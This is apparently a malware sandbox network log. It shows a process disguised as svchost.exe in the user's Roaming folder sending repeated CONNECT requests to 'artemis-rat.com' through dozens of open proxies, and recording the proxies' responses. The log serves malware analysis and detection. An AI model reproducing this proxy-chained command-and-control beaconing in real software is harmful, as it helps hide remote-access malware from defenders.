Mar 9, 2024 13:14:29.525211096 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx/1.8.1 Date: Sun, 10 Mar 2024 00:35:35 GMT Content-Type: text/html Content-Length: 172 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2193	192.168.2.5	56844	8.219.177.134	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.093266010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2194	192.168.2.5	56344	117.160.250.138	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.101162910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.850224018 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2195	192.168.2.5	56996	157.185.157.151	26589	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.104157925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2196	192.168.2.5	56931	147.75.92.251	9401	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.115442991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.391251087 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2197	192.168.2.5	55881	20.118.133.34	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.118267059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146018982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.146545887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2198	192.168.2.5	56884	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.130656958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2199	192.168.2.5	56912	160.16.90.35	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.135351896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.833374023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.334989071 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:31.217138052 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2200	192.168.2.5	56918	45.124.113.6	9500	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.138879061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880188942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.880471945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.816000938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.640460014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2201	192.168.2.5	56935	211.222.252.187	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.143723011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2202	192.168.2.5	56902	185.158.114.14	25697	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.148824930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2203	192.168.2.5	56895	120.76.42.209	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.151160002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2204	192.168.2.5	56883	36.95.13.18	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.151274920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2205	192.168.2.5	55793	148.72.206.250	35703	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.155010939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333092928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.334084988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2206	192.168.2.5	56904	114.132.202.78	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.155500889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880320072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.880517006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.573137999 CET	84	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2207	192.168.2.5	56962	60.246.122.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.166073084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2208	192.168.2.5	55768	190.239.220.6	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.173748970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.177047968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.779622078 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2209	192.168.2.5	56928	185.219.133.106	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.182873011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.528609037 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2210	192.168.2.5	56967	51.20.50.149	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.191104889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.545476913 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2211	192.168.2.5	56978	173.249.29.243	9123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.192162991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.506654024 CET	536	IN	HTTP/1.1 503 Service Unavailable Server: squid/3.5.27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3832 X-Squid-Error: ERR_DNS_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2212	192.168.2.5	56961	45.138.87.238	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.197554111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2213	192.168.2.5	56979	128.199.221.91	8004	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.237677097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.942714930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2214	192.168.2.5	55688	128.199.221.91	7176	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.238253117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974098921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2215	192.168.2.5	55848	45.120.178.197	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.240248919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2216	192.168.2.5	57014	142.54.239.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.244441032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2217	192.168.2.5	57046	104.25.135.170	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.246469021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.400892973 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2218	192.168.2.5	56974	103.83.232.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.250709057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.672576904 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2219	192.168.2.5	57049	188.114.99.37	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.254894972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
